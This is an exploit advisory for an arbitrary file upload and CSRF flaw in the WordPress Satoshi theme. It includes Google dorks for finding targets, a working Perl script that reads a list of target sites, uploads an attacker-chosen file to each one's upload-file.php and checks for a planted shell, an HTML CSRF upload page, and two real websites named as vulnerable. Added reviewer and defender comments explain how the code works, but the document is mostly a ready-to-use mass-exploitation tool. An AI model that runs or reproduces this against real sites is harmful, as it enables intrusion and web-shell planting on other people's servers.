- ####################################################################
- # Exploit Title : WordPress 4.7.13 Satoshi Themes 2.0 CSRF Unauthorized Insert File
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 05/06/2019
- # Vendor Homepage : vooshthemes.com - tecnoge.com - netsons.com
- # WordPress Affected Versions : 4.7.13 - 3.4.2
- # Theme Affected Version : 2.0
- # Information Link : themesinfo.com/satoshi-theme-wordpress-portfolio-jpx
- themesinfo.com/?search_type=folder&search=satoshi
- # Theme used on : 106 websites
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:Design By Voosh Themes
- inurl:/wp-content/themes/satoshi/ - intext:Design By TecnoGe Informatica -
- # Vulnerability Type :
- CWE-352 [ Cross-Site Request Forgery (CSRF) ]
- CWE-264 [ Permissions, Privileges, and Access Controls ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description About Software :
- *****************************
- Satoshi v2.0 theme WordPress portfolio. A Free Portfolio Theme Developed By Voosh Themes.
- ####################################################################
- # Impact :
- ***********
- WordPress 3.4.2/4.7.13 Satoshi Themes 2.0 is prone to a vulnerability that lets attackers
- upload arbitrary files because it fails to adequately sanitize user-supplied input.
- An attacker can exploit this vulnerability to upload arbitrary code and execute
- it in the context of the webserver process. This may facilitate unauthorized access
- or privilege escalation; other attacks are also possible. This WordPress theme's
- upload form (ajaxupload.3.5.js) is vulnerable to CSRF file upload. CSRF occurs when the web application
- does not, or cannot, sufficiently verify whether a well-formed, valid, consistent request
- was intentionally provided by the user who submitted the request.
- ####################################################################
- # Vulnerability :
- ***************
- /wp-content/themes/satoshi/upload-file.php
- Vulnerability Message :
- *********************
- error
- Directory File Path :
- ******************
- /wp-content/themes/satoshi/images/[YOURFILENAME].html
- # Arbitrary File Upload / Unauthorized File Insert Perl Exploiter :
- ********************************************************
- #!/usr/bin/perl
- use LWP::UserAgent;
- # Coded By KingSkrupellos
- # Cyberizm Digital Security Army
- # Perl Exploiter By CyBeRiZM :)
- # NOTE(review): no `use strict; use warnings;` -- the localtime() unpack below
- # assigns undeclared package globals, and a mistyped variable name would go unnoticed.
- my $qqvul ="/upload-file.php";# relative path of the theme's upload endpoint; appended to /wp-content/themes/satoshi/ in expqq()
- # Human-readable start time, printed in the "[+] Started" banner below.
- my $datestring = localtime();
- # Unpacks localtime() into nine package globals; none of them is read anywhere in the visible script.
- ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();
- # Returns one of six hard-coded browser User-Agent strings, chosen uniformly at random.
- # Defender note: because the UA header is rotated per target, it is not a reliable
- # fingerprint for this tool; the request sequence against upload-file.php is (see expqq).
- sub randomagent {
- my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
- 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
- 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
- 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
- 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
- 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
- );
- # `rand @array` evaluates the array in scalar context, giving a random index in 0..$#array.
- my $random = $array[rand @array];
- return($random);
- }
- # Main flow: print the banner, read the target-list path and the local file name
- # from STDIN, then call expqq() once per non-empty line of the list.
- flag();
- print "[+] Enter List Of Target : ";
- chomp (my $list=<>);
- print "[+] Enter Evil File : ";
- chomp (my $file=<>);
- print "[+] Started : $datestring\n";
- # Two-argument open: the mode is prepended to the user-supplied path, so the
- # path itself is not validated (three-argument open would be the safe form).
- open(my $arq,'<'.$list) || die($!);
- my @site = <$arq>;
- # Drop blank lines; lines are chomped individually inside the loop below.
- @site = grep { !/^$/ } @site;
- close($arq);
- # $#site is the last index, so $#site+1 is the number of targets read.
- print "[".($#site+1)."] URL to test upload\n\n";
- # Declared undef and incremented on first use, so numbering starts at 1.
- my $i;
- foreach my $web(@site){$i++;
- chomp($web);
- # Default to plain http:// when the entry carries no scheme.
- if($web !~ /^(http|https):\/\//){
- $web = 'http://'.$web;
- }
- print "[$i] $web \n";
- expqq($web);# one probe-and-upload attempt per target; $file and $qqvul are read as globals inside expqq()
- }
- # expqq($base_url): probes one site for the theme upload endpoint, posts the
- # local file named in the global $file to it, then fetches the expected image
- # path to see whether the file landed. Relies on the globals $file and $qqvul.
- # Defender note: the observable server-side pattern is a GET of
- # /wp-content/themes/satoshi/upload-file.php, a multipart POST to the same path
- # with a form field named "uploadfile", then a GET of /wp-content/themes/satoshi/images/<name>.
- # The fix on the server side is to require authentication and a nonce on the
- # upload endpoint and to restrict accepted file types there, not in the browser.
- sub expqq{
- my $useragent = randomagent();#Get a Random User Agent
- # verify_hostname => 0 disables TLS certificate/hostname checking for https targets.
- my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });#Https websites accept
- $ua->timeout(10);
- $ua->agent($useragent);
- print "[Testing] Exploit Existence \n";
- my $url = $_[0]."/wp-content/themes/satoshi/".$qqvul;
- my $ss = $_[0]."/wp-content/themes/satoshi/images/".$file;
- my $response = $ua->get($url);
- # Any 2xx reply (or a body containing "error", which the advisory says the
- # endpoint prints on a bare GET) counts as "exists" -- a weak indicator on its own.
- if ($response->is_success || $response->content=~/error/){
- print "[OK] Exploit Exists\n";
- print "[*] Sent payload\n";
- my $regex = 'success';
- # form-data with a one-element arrayref value: LWP reads the local file named
- # in $file and sends its contents as the "uploadfile" part.
- my $body = $ua->post( $url,
- Content_Type => 'form-data',
- Content => [ 'uploadfile' => ["$file"] ]
- );
- # As above, a plain 2xx is enough to reach the "executed" branch.
- if ($body->is_success ||$body->content=~ /$regex/){
- print "[+] Payload successfully executed\n";
- print "[*] Checking if shell was uploaded\n\n";
- my $res = $ua->get($ss);
- if ($res->is_success){
- # NOTE(review): this message omits "/themes/" and so does not match the URL
- # actually checked in $ss above (/wp-content/themes/satoshi/images/...).
- print "[Upload] $_[0]/wp-content/satoshi/images/$file\n";
- }
- else {
- print "[Faild] check file\n";
- }
- }
- else {print "[-] Payload failed : Not vulnerable\n";
- }
- }
- else {
- print "[No] Exploit Not Found\n";
- }
- }
- # Prints the tool banner to STDOUT; takes no arguments and returns the value of print.
- sub flag {print "\n[+] WP Satoshi Theme File Upload Exploiter By Cyberizm Digital Security Team \n[*] Coder => Cyberizm \n\n";
- }
- ####################################################################
- Cross Site Request Forgery CSRF Exploiter :
- *****************************************
- <!DOCTYPE html>
- <html>
- <head>
- <meta http-equiv="content-type" content="text/html; charset=UTF-8">
- <title></title>
- <!-- Both scripts are fetched over plain http:, with no integrity attribute; the
-      second one is the theme's own upload helper, here pointed at a localhost placeholder. -->
- <script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
- <script type='text/javascript' src="http://localhost/wp-content/themes/satoshi/js/ajaxupload.3.5.js"></script>
- <script type='text/javascript'>//<![CDATA[
- window.onload=function(){
- $(function(){
- var btnUpload=$('#upload');
- var status=$('#logo-upload-status');
- // Wires the button to the theme's upload-file.php; the file goes in the
- // form field named "uploadfile", the same field the Perl script posts.
- new AjaxUpload(btnUpload, {
- action: 'http://localhost/wp-content/themes/satoshi/upload-file.php',
- name: 'uploadfile',
- onSubmit: function(file, ext){
- // The extension check below is commented out in this page. It only ever ran
- // in the browser, so disabling it is trivial: the server must enforce its own
- // allow-list rather than rely on this client-side filter.
- /*
- if (! (ext && /^(jpg|png|jpeg|gif|html|txt)$/.test(ext))){
- // extension is not allowed
- status.text('Only HTML,TXT, JPG, PNG or GIF files are allowed');
- return false;
- }*/
- status.text('Uploading...');
- },
- onComplete: function(file, response){
- //On completion clear the status
- status.text('');
- //Add uploaded file to list
- // The endpoint is expected to reply with the bare string "success"; anything
- // else is shown as an error entry.
- if(response==="success"){
- $('<li></li>').appendTo('#files').html('<img src="http://localhost/wp-content/themes/satoshi/images/'+file+'" alt="" /><br />'+file).addClass('success');
- $('#satoshi_logo_image').val(file);
- } else{
- $('<li></li>').appendTo('#files').text(file).addClass('error');
- }
- }
- });
- });
- }//]]>
- </script>
- </head>
- <body>
- <!-- Minimal markup the script above expects: a status span, the hidden-value
-      text field the theme reads the logo name from, and the upload button. -->
- <span id="logo-upload-status"></span>
- <input class="logo-name" id="satoshi_logo_image" type="text" name="satoshi_logo_image" value="">
- <input type="button" class="background_pattern_button" id="upload" value="Choose Logo">
- </body>
- </html>
- ####################################################################
- # Example Vulnerable Sites :
- ************************
- [+] wordsmyth.se/wp-content/themes/satoshi/upload-file.php
- [+] fondaliscenografici.com/wp-content/themes/satoshi/upload-file.php
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################